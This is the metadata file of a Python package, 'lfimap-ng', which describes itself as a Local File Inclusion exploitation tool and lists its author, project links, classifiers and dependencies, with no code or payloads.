Metadata-Version: 2.4
Name: lfimap-ng
Version: 1.0.0
Summary: A Powerful Local File Inclusion (LFI) Exploitation Tool
Home-page: https://gitlab.com/relunsec/lfimap
Author: RelunSec (Org)
Author-email: cs7778503@gmail.com
Project-URL: Bug Tracker, https://gitlab.com/relunsec/lfimap/-/issues
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.6
Classifier: Programming Language :: Python :: 3.7
Classifier: Programming Language :: Python :: 3.8
Classifier: Programming Language :: Python :: 3.9
Classifier: Programming Language :: Python :: 3.10
Classifier: License :: OSI Approved :: MIT License
Classifier: Operating System :: OS Independent
Classifier: Development Status :: 5 - Production/Stable
Classifier: Environment :: Console
Classifier: Intended Audience :: Developers
Classifier: Intended Audience :: Information Technology
Classifier: Topic :: Security
Classifier: Topic :: System :: Networking
Requires-Python: >=3.6
License-File: LICENSE
Requires-Dist: requests
Requires-Dist: rich
Requires-Dist: requests-ntlm
Dynamic: author
Dynamic: author-email
Dynamic: classifier
Dynamic: description
Dynamic: description-content-type
Dynamic: home-page
Dynamic: license-file
Dynamic: project-url
Dynamic: requires-dist
Dynamic: requires-python
Dynamic: summary
